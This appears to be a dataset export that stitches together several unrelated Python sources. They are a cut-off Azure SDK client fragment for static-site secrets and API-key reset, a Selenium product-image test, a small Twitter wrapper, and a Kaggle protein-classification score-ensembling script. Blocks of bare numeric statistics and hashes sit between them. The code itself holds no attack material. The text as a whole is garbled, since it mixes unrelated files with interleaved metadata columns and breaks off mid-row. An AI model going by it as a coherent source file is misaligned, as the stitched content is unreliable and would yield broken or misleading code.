:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StringDictionary, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.StringDictionary
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StringDictionary"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self.list_static_site_secrets.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('StringDictionary', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_static_site_secrets.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/listSecrets'} # type: ignore
async def reset_static_site_api_key(
self,
resource_group_name: str,
name: str,
reset_properties_envelope: "_models.StaticSiteResetPropertiesARMResource",
**kwargs
) -> None:
"""Resets the api key for an existing static site.
Description for Resets the api key for an existing static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:param reset_properties_envelope:
:type reset_properties_envelope: ~azure.mgmt.web.v2020_09_01.models.StaticSiteResetPropertiesARMResource
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.reset_static_site_api_key.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(reset_properties_envelope, 'StaticSiteResetPropertiesARMResource')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
reset_static_site_api_key.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/resetapikey'} # type: ignore
| 50.306165
| 249
| 0.666753
| 10,501
| 96,286
| 5.884202
| 0.028378
| 0.02638
| 0.034391
| 0.024276
| 0.93575
| 0.92795
| 0.921071
| 0.908302
| 0.89898
| 0.888785
| 0
| 0.012478
| 0.229265
| 96,286
| 1,913
| 250
| 50.332462
| 0.820148
| 0.105612
| 0
| 0.838046
| 0
| 0.010283
| 0.158275
| 0.081019
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012853
| false
| 0
| 0.006855
| 0
| 0.073693
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4a8176aeb45e1ffa100ff73c8a9741d3f405acaf
| 181
|
py
|
Python
|
Selenium/Opencart_windows_operations/test_image_upload.py
|
BahrmaLe/otus_python_homework
|
510a4f1971b35048d760fcc45098e511b81bea31
|
[
"MIT"
] | 1
|
2021-02-25T15:37:21.000Z
|
2021-02-25T15:37:21.000Z
|
Selenium/Opencart_windows_operations/test_image_upload.py
|
BahrmaLe/otus_python_homework
|
510a4f1971b35048d760fcc45098e511b81bea31
|
[
"MIT"
] | null | null | null |
Selenium/Opencart_windows_operations/test_image_upload.py
|
BahrmaLe/otus_python_homework
|
510a4f1971b35048d760fcc45098e511b81bea31
|
[
"MIT"
] | null | null | null |
def test_image_name(add_product_with_image, find_product_image):
print(type(find_product_image))
print(find_product_image)
assert 'macbook_pro' in find_product_image
| 22.625
| 64
| 0.801105
| 27
| 181
| 4.851852
| 0.518519
| 0.335878
| 0.48855
| 0.320611
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.132597
| 181
| 7
| 65
| 25.857143
| 0.834395
| 0
| 0
| 0
| 0
| 0
| 0.061798
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| false
| 0
| 0
| 0
| 0.25
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
434cde88cff137e984d86a958e97eaea51192d59
| 243
|
py
|
Python
|
twitter/__init__.py
|
kwnktks0515/Twitter_with_Python
|
80dff5e0f0080a7e5b64dfa134f2e33aba0ed5f8
|
[
"MIT"
] | null | null | null |
twitter/__init__.py
|
kwnktks0515/Twitter_with_Python
|
80dff5e0f0080a7e5b64dfa134f2e33aba0ed5f8
|
[
"MIT"
] | null | null | null |
twitter/__init__.py
|
kwnktks0515/Twitter_with_Python
|
80dff5e0f0080a7e5b64dfa134f2e33aba0ed5f8
|
[
"MIT"
] | null | null | null |
"""init"""
from twitter.twitter import Twitter
def twitter(consumer_key, consumer_secret, access_token, access_token_secret):
"""return Twitter Class"""
return Twitter(consumer_key, consumer_secret, access_token, access_token_secret)
| 34.714286
| 84
| 0.790123
| 31
| 243
| 5.870968
| 0.387097
| 0.241758
| 0.197802
| 0.285714
| 0.659341
| 0.659341
| 0.659341
| 0.659341
| 0.659341
| 0.659341
| 0
| 0
| 0.111111
| 243
| 6
| 85
| 40.5
| 0.842593
| 0.102881
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
43716343f2b07b0c3a5a1b7f8a920c867f1c7062
| 19,896
|
py
|
Python
|
vpp/src/result_summary_final.py
|
guitarmind/HPA-competition-solutions
|
547d53aaca148fdb5f4585526ad7364dfa47967d
|
[
"MIT"
] | null | null | null |
vpp/src/result_summary_final.py
|
guitarmind/HPA-competition-solutions
|
547d53aaca148fdb5f4585526ad7364dfa47967d
|
[
"MIT"
] | null | null | null |
vpp/src/result_summary_final.py
|
guitarmind/HPA-competition-solutions
|
547d53aaca148fdb5f4585526ad7364dfa47967d
|
[
"MIT"
] | null | null | null |
# -*- coding: UTF-8 -*-
import os
import numpy as np
from utils.multi_thres_and_leak import use_threshold, replace_leak_write_result
def summary_scores(score_files, save_path, weight=None, save_result=True):
print'total {} result'.format(len(score_files)),
if weight is None:
weight = [1 for _ in xrange(len(score_files))]
assert len(score_files) == len(weight), 'Error length of score_files not queal to weight'
scores = []
for i, sub_file in enumerate(score_files):
scores.append(np.load(sub_file) * weight[i])
scores = np.array(scores)
ave_scores = np.sum(scores, 0) / sum(weight)
if save_result:
np.save(save_path, ave_scores)
print 'save to:', save_path
def summary_scores_lcp_inceptionv3_800():
score_files = [
# inceptionv3 800
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_0_epoch8_score.npy',
# 0.582
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_0_epoch18_score.npy',
# 0.578
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_1_epoch12_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_2_epoch15_score.npy',
# 0.580
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_3_epoch21_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_4_epoch14_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_4_epoch14_score.npy',
# 0.589
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_5_epoch13_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_6_epoch12_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_7_epoch12_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_8_epoch12_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_9_epoch12_score.npy',
]
save_path = './results/lcp_inceptionv3_800_score.npy'
summary_scores(score_files, save_path)
multi_thres_file = use_threshold(save_path)
def summary_scores_xie_inceptionv3_800():
score_files = [
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_3_epoch28_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_3_epoch9_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_1/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_1_3_epoch12_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_2/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_2_3_epoch12_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_3/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_3_3_epoch12_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_4/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_4_3_epoch12_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_3_epoch23_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_3_epoch13_score.npy',
]
save_path = './results/xie_inceptionv3_800_score.npy'
summary_scores(score_files, save_path)
multi_thres_file = use_threshold(save_path)
def summary_scores_inceptionv3_800():
summary_scores_lcp_inceptionv3_800()
summary_scores_xie_inceptionv3_800()
score_files = [
'./results/lcp_inceptionv3_800_score.npy',
'./results/xie_inceptionv3_800_score.npy']
save_path = './results/inceptionv3_800_score.npy'
summary_scores(score_files, save_path, weight=[21, 10])
multi_thres_file = use_threshold(save_path)
def summary_scores_inceptionv3_650():
score_files = [
# inceptionv3 650
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold_0_epoch13_score.npy',
'./models/inceptionv3_fc/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_5fold_pretrain/submit/inceptionv3_fc_offi_hpa_lr0.05_weightedsamper_mlsm_5fold_pretrain_3_epoch13_score.npy',
]
save_path = './results/inceptionv3_650_score.npy'
summary_scores(score_files, save_path)
multi_thres_file = use_threshold(save_path)
def summary_scores_inceptionv4_800():
score_files = [
# inceptionv4 800
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_0_epoch13_score.npy',
# 0.589
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_1_epoch12_score.npy',
# 0.587
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_2_epoch12_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_2_epoch15_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_3_epoch12_score.npy',
# 0.589
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_3_epoch16_score.npy',
# 0.589
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_4_epoch12_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_4_epoch15_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_5_epoch12_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_6_epoch16_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_7_epoch14_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_7_epoch20_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_8_epoch12_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_8_epoch22_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_9_epoch13_score.npy',
]
save_path = './results/inceptionv4_800_score.npy'
summary_scores(score_files, save_path)
multi_thres_file = use_threshold(save_path)
def summary_scores_inceptionv4_650():
score_files = [
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold_0_epoch17_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold_1_epoch14_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold_2_epoch13_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold_3_epoch16_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold_4_epoch15_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold_5_epoch13_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold_6_epoch13_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold_7_epoch14_score.npy',
'./models/inceptionv4_fc/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold/submit/inceptionv4_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold_8_epoch16_score.npy',
]
save_path = './results/inceptionv4_650_score.npy'
summary_scores(score_files, save_path)
multi_thres_file = use_threshold(save_path)
def summary_scores_xception_800():
score_files = [
# xception 800
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_0_epoch14_score.npy',
# 0.577
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_1_epoch18_score.npy',
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_2_epoch18_score.npy',
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_3_epoch18_score.npy',
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_4_epoch14_score.npy',
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_5_epoch17_score.npy',
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_6_epoch13_score.npy',
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_7_epoch13_score.npy',
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_8_epoch13_score.npy',
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_800_pretrain_5fold_9_epoch12_score.npy',
]
save_path = './results/xception_800_score.npy'
summary_scores(score_files, save_path)
multi_thres_file = use_threshold(save_path)
def summary_scores_xception_650():
score_files = [
# xception 650
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_650_pretrain_10fold_0_epoch8_score.npy',
# 0.592
]
save_path = './results/xception_650_score.npy'
summary_scores(score_files, save_path)
multi_thres_file = use_threshold(save_path)
def summary_scores_xception_512():
score_files = [
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_5fold/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_5fold_0_epoch17_score.npy',
# 0.569
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_5fold/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_5fold_1_epoch12_score.npy',
# 0.565
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_5fold/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_5fold_3_epoch14_score.npy',
# 0.577
'./models/xception_fc/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm/submit/xception_fc_offi_hpa_lr0.05_weightedsamper_mlsm_0_epoch22_score.npy',
# 0.572
'./models/xception_fc/xception_fc_offi_lr0.001_weightedsamper_mlsm_rms_lrexp_pretrain/submit/xception_fc_offi_lr0.001_weightedsamper_mlsm_rms_lrexp_pretrain_0_epoch6_score.npy',
# 0.574
]
save_path = './results/xception_512_score.npy'
summary_scores(score_files, save_path)
multi_thres_file = use_threshold(save_path)
def feature_concat_incv3_incv4_xcep_fc():
# base_path = '/disk/223/xiejb231/unet_mxnet2ncnn/datasets/humanprotein/scripts/Ensemble/FC/inceptionv3v4x_fc_800_offi_hpa/lr0.05_exp_mlsm_sgd_1layer_dropout_2layer/submit/inceptionv3v4x_fc_800_offi_hpa_submission_fold'
base_path = './models/MLP/lr0.5_step_0.5_10_mlsm_sgd_2layer_10fold/submit/inceptionv3_inceptionv4_xception_800_offi_hpa_submission_fold'
score_files = [
base_path + '0_score.npy',
base_path + '1_score.npy',
base_path + '2_score.npy',
base_path + '3_score.npy',
base_path + '4_score.npy',
base_path + '5_score.npy',
base_path + '6_score.npy',
base_path + '7_score.npy',
base_path + '8_score.npy',
base_path + '9_score.npy',
]
save_path = './results/featureconcat_incv3_800_incv4_800_xcep_800_score.npy'
summary_scores(score_files, save_path)
multi_thres_file = use_threshold(save_path)
def feature_concat_incv3_incv4_xcep_fc_2():
# base_path = '/disk/223/xiejb231/unet_mxnet2ncnn/datasets/humanprotein/scripts/Ensemble/FC/inceptionv3v4x_fc_800_offi_hpa/lr0.05_exp_mlsm_sgd_1layer_dropout_2layer/submit/inceptionv3v4x_fc_800_offi_hpa_submission_fold'
base_path = './models/MLP/lr0.5_exp_bce_sgd_2layer_10fold/submit/inceptionv3_inceptionv4_xception_800_offi_hpa_submission_fold'
score_files = [
base_path + '0_score.npy',
base_path + '1_score.npy',
base_path + '2_score.npy',
base_path + '3_score.npy',
base_path + '4_score.npy',
base_path + '5_score.npy',
base_path + '6_score.npy',
base_path + '7_score.npy',
base_path + '8_score.npy',
base_path + '9_score.npy',
]
save_path = './results/featureconcat_incv3_800_incv4_800_xcep_800_2_score.npy'
summary_scores(score_files, save_path)
multi_thres_file = use_threshold(save_path)
def summary_scores_any_sub():
score_files_weight = [
['./results/inceptionv3_800_score.npy', 31],
['./results/inceptionv3_650_score.npy', 11],
['./results/inceptionv4_800_score.npy', 21],
['./results/inceptionv4_650_score.npy', 6],
['./results/xception_800_score.npy', 9],
['./results/xception_650_score.npy', 2],
['./results/xception_512_score.npy', 15],
['./results/featureconcat_incv3_800_incv4_800_xcep_800_score.npy', 13], # 0.630
['./results/featureconcat_incv3_800_incv4_800_xcep_800_2_score.npy', 13]
]
score_files = [_[0] for _ in score_files_weight]
weight = [_[1] for _ in score_files_weight]
for _it in xrange(len(score_files)):
print os.path.basename(score_files[_it]), ':', weight[_it]
print weight
save_path = './results/summary_final_1_score.npy'
summary_scores(score_files, save_path, weight)
multi_thres_file = use_threshold(save_path)
final_commit_file = replace_leak_write_result(multi_thres_file, show_replace=False)
print '*' * 84
print '* It\'s our first final submission --> ' + final_commit_file + ' *'
print '*' * 84
def summary_scores_any_sub_2():
score_files_weight = [
[
'/disk/223/lichuanpeng/Project_Models/Kaggle/HumanProtein/result_summary/best_submit/summary_sub_646_score.npy',
1],
['/disk/223/lichuanpeng/Project_Models/Kaggle/HumanProtein/result_summary/best_submit/xie_646.npy', 1],
['/disk/223/lichuanpeng/Project_Models/Kaggle/HumanProtein/result_summary/best_submit/sub_9_645.npy', 1],
]
score_files = [_[0] for _ in score_files_weight]
weight = [_[1] for _ in score_files_weight]
for _it in xrange(len(score_files)):
print os.path.basename(score_files[_it]), ':', weight[_it]
save_path = './results/summary_final_2_score.npy'
summary_scores(score_files, save_path, weight)
multi_thres_file = use_threshold(save_path)
final_commit_file = replace_leak_write_result(multi_thres_file, show_replace=False)
print '*' * 85
print '* It\'s our first final submission --> ' + final_commit_file + ' *'
print '*' * 85
if __name__ == '__main__':
summary_scores_inceptionv3_800()
summary_scores_inceptionv3_650()
summary_scores_inceptionv4_800()
summary_scores_inceptionv4_650()
summary_scores_xception_512()
summary_scores_xception_800()
summary_scores_xception_650()
feature_concat_incv3_incv4_xcep_fc()
feature_concat_incv3_incv4_xcep_fc_2()
summary_scores_any_sub()
summary_scores_any_sub_2()
| 70.303887
| 223
| 0.818355
| 2,877
| 19,896
| 5.026764
| 0.058394
| 0.061955
| 0.085742
| 0.10289
| 0.926428
| 0.895035
| 0.874983
| 0.865648
| 0.861361
| 0.857696
| 0
| 0.088535
| 0.103036
| 19,896
| 282
| 224
| 70.553191
| 0.721842
| 0.031564
| 0
| 0.339286
| 0
| 0
| 0.690365
| 0.671344
| 0
| 0
